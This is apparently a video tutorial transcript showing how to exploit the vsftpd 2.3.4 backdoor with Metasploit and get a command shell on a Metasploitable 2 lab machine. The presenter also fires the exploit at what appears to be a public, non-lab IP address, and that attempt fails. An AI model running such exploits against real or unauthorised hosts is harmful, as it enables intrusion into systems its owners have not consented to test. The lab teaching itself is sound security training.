Welcome. In this video we will see VSFTP exploitation in Metasploit. Exploit modules are searchable in Metasploit. At the MSF prompt, you can use the search command with any word or text string entered after the command. Let's open up MSF console. Type search VSFTPD. The Metasploitable image is vulnerable, so we will use that against the target machine. At the MSF console prompt, type user command, type info exploit Unix FTP VSFTPD 234 backdoor. Here you can see that module information with basic options and their descriptions. Type use exploit Unix FTP VSFTPD 234 backdoor. You will see console prompt changed, signaling MSF is currently operating with that exploit ready to go. But before running the exploit, we must set the remote host, that is target. Type set rhost 107.180.54.186. Type exploit. Here you can see that this is private system, no anonymous login. Now let's try it on Metasploitable 2 machine. Type set rhost 192.168.0.12. Here you can see that rhost is set Metasploitable 2 machine IP address. Now type show payload. Here you can see that CMD Unix interact payload. Let's set interact payload. Type show options. Here you can see that required options are set. Now let's exploit it. Type exploit. You can observe that command cell session 1 is opened. So that's it in this video on VSTP exploitation in Metasploit. Thank you for watching this video.